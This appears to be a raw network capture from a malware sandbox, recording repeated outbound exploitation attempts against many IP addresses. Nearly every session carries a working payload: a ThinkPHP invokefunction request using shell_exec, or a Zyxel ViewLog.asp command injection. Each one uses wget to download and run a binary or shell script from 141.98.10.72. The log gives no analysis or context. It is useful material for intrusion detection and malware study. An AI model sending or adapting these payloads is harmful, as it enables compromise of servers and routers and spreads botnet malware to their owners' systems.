                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:33:45.746645927 CET361INHTTP/1.1 400 Bad Request
                                                        Server: openresty
                                                        Date: Wed, 14 Feb 2024 08:33:45 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 154
                                                        Connection: close
                                                        Request-Id: 65cc7ae9c9bf19e999c27c3773e89f55
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        402192.168.2.1454450112.29.214.2880
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:45.370955944 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:33:45.748254061 CET361INHTTP/1.1 400 Bad Request
                                                        Server: openresty
                                                        Date: Wed, 14 Feb 2024 08:33:45 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 154
                                                        Connection: close
                                                        Request-Id: 65cc7ae9806ca5d06ac047a71da5dfd6
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        403192.168.2.1454444112.29.214.2880
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:45.376946926 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:33:45.747538090 CET361INHTTP/1.1 400 Bad Request
                                                        Server: openresty
                                                        Date: Wed, 14 Feb 2024 08:33:45 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 154
                                                        Connection: close
                                                        Request-Id: 65cc7ae96e6e2e38c7d337d50fa1c340
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        404192.168.2.1453590112.126.25.9980
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:45.379843950 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        405192.168.2.143337688.248.194.19880
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:45.637700081 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        406192.168.2.1456138112.17.45.1880
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:45.779839993 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        407192.168.2.144890231.136.80.738080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:45.918565989 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:46.599430084 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:47.943285942 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:50.823215008 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:56.199079037 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:06.950640917 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:28.965599060 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:11.972038984 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        408192.168.2.143703831.136.199.788080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:45.918616056 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:46.599427938 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:47.943310976 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:50.823191881 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:56.199105978 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:06.950632095 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:28.965617895 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:11.971973896 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        409192.168.2.143777094.121.209.968080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:45.936424971 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        410192.168.2.145186631.136.235.1058080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:46.131643057 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:46.791372061 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:48.103372097 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:50.823189974 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:56.199114084 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:06.694549084 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:28.965620995 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:11.971931934 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        411192.168.2.144805285.30.215.2418080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:46.163703918 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
